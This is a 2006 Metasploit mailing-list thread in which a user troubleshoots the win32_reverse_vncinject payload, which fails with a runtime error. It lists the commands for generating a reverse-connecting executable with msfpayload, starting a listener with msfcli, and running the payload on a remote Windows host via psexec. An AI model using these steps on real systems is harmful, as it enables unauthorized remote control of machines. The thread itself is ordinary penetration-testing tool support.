msfpayload win32_reverse_vncinject ... X

[sigtrap at sigtrap.org (Sigtrap)]

Hi, 
I try to use the win32_reverse_vncinject payload as an EXE to launch it with "psexec -c \\host vnc_pl.exe" to get a 
remote desktop on a remote computer that I have administrator access to.

As (some copied from HD Moore):
1) Generate an executable:
$ msfpayload win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 X > vnc_pl.exe

2) Start up the Framework with the payload_handler exploit module:
$ msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=1.2.3.4 LPORT=3333 E

3) Start the vnc_pl.exe on a remote klient (tried both Windows 2000 and XP):
c:\> psexec -c \\host vnc_pl.exe

vnc_pl.exe connects back and the DLL is transfered and launched. The shell (CMD.EXE) pops up and the error occurs. No 
VNC server is started.
Tacks for your help
//Sigtrap


-------------------------
Ursprungligt Meddelande:
Fr?n: mmiller at hick.org
Till: Sigtrap <sigtrap at sigtrap.org>
Datum: fredag, januari 27 2006 14:54
?mne: Re: [framework] msfpayload win32_reverse_vncinject ... X
On Thu, Jan 26, 2006 at 01:38:22PM +0100, Sigtrap wrote:
> Hi,
> I know there are problems with "msfpayload win32_reverse_vncinject ... X" (combined with msfcli).
> Am I having the same known problem when I get "Runtime Error!"? (see attachment for error)
> Is there any solution? Can it work at all? Have anyone tried this with MSF 3.0?
> I am running x86, Gentoo, MSF 2.5 and have tried different EXITFUNC.

Can you elaborate more on what you're trying to do?  Specific command
lines would be useful.  Are you trying to use the payload generated by
msfpayload in a custom exploit outside of the framework or something?